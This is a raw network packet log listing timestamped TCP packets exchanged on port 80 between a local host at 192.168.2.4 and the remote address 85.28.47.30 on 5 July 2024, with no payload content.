                                                                Jul 5, 2024 04:36:05.506226063 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506227016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506237030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506258011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506267071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506278992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506285906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506309986 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506351948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506361008 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506373882 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506385088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506387949 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506413937 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506442070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506453037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506464005 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506474018 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506484032 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506494999 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506505966 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506519079 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506568909 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506581068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506591082 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506601095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506612062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506618023 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506643057 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506697893 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506709099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506719112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506730080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506741047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506745100 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506752968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506756067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506763935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506778002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506787062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506808996 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506819010 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506822109 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506834030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506850958 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506861925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506871939 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506875992 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506892920 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506911993 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.506987095 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.506998062 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507008076 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507019043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507031918 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507036924 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507062912 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507075071 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507141113 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507159948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507169962 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507180929 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507189035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507190943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507200003 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507205009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507215023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507224083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507225037 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507237911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507247925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507249117 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507260084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507268906 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507283926 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507299900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507395983 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507406950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507416964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507427931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507441044 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507446051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507450104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507466078 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507478952 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507491112 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507493973 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507500887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507509947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.507529974 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.507550001 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.596857071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.596896887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.596915960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.596918106 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.596930027 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.596936941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.596942902 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.596951962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.596966982 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.596975088 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.596978903 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.596991062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.596992970 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597007990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597017050 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597053051 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597079992 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597093105 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597105026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597116947 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597124100 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597140074 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597167969 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597203016 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597214937 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597225904 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597238064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597254038 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597259045 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597270012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597280025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597280979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597299099 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597302914 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597312927 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597330093 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597342014 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597367048 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597399950 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597410917 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597420931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597433090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597445965 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597449064 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597456932 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597469091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597480059 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597487926 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597492933 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597505093 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597508907 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597517014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597537994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597543955 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597549915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597568989 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597579002 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597595930 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597596884 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597609043 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597620964 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597623110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597634077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597649097 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597670078 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597678900 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597687960 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597702026 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597714901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597717047 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597728968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597742081 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597745895 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597771883 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597784042 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597810030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597822905 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597835064 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597848892 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597860098 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597888947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597898006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597910881 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597923994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597935915 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597945929 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597950935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597964048 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.597975969 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.597999096 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598021984 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598036051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598047972 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598083019 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598112106 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598125935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598134995 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598148108 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598159075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598165035 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598171949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598185062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598203897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598207951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598226070 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598228931 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598237991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598252058 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598261118 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598288059 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598292112 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598303080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598315001 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598328114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598335028 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598354101 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598378897 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598388910 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598402023 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598411083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598424911 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598438025 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598438025 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598468065 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598480940 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598519087 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598530054 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598541975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598555088 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598567009 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598571062 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598598957 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598611116 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598664999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598676920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598687887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598700047 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598711967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598714113 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598725080 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598737955 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598742962 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598751068 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598757982 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598763943 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598776102 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598787069 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598793030 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598808050 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598819017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598834038 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598862886 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598886013 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598897934 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598908901 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.598934889 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.598959923 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.599010944 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599021912 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599034071 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599052906 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599062920 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.599066973 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599081039 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599082947 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.599113941 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.599142075 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599154949 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599165916 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599184990 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599195004 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.599199057 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599205017 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.599211931 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599224091 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599236012 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599237919 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.599248886 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599257946 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.599261999 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599277020 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599280119 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.599289894 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599292994 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.599303961 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.599328041 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.599348068 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.688714981 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688743114 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688755989 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688795090 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688807011 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688810110 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.688821077 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688864946 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.688874006 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688888073 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688889980 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.688900948 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688914061 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688916922 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.688926935 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688956022 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.688970089 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688978910 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.688982010 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.688994884 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689008951 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689018011 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689019918 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689033985 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689040899 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689084053 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689090014 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689110994 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689126968 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689138889 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689151049 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689152002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689176083 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689197063 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689198971 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689212084 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689223051 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689237118 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689250946 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689274073 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689305067 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689652920 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689663887 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689676046 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689687967 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689702034 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689707041 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689716101 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689728975 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689729929 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689749002 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689769030 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689773083 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689785957 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689796925 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689810991 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689822912 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689824104 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689836979 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689848900 CEST804973085.28.47.30192.168.2.4
                                                                Jul 5, 2024 04:36:05.689857960 CEST4973080192.168.2.485.28.47.30
                                                                Jul 5, 2024 04:36:05.689861059 CEST804973085.28.47.30192.168.2.4
